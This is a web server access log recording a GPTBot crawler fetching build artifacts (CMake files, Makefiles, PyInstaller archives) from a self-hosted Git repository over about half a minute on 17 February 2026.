"/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 10899] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" -[17/Feb/2026:15:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 40492] [Gzip 14.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" -[17/Feb/2026:15:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:15:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 59725] [Gzip 16.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" -[17/Feb/2026:15:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10948] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:15:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10947] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:15:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10948] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:15:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11827] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11276] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29812] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11194] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14297] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14640] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11101] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73577] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10078] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9959] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16049] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11026] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12011] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9939] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21837] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16404] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14337] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9972] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11520] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10180] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39744] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 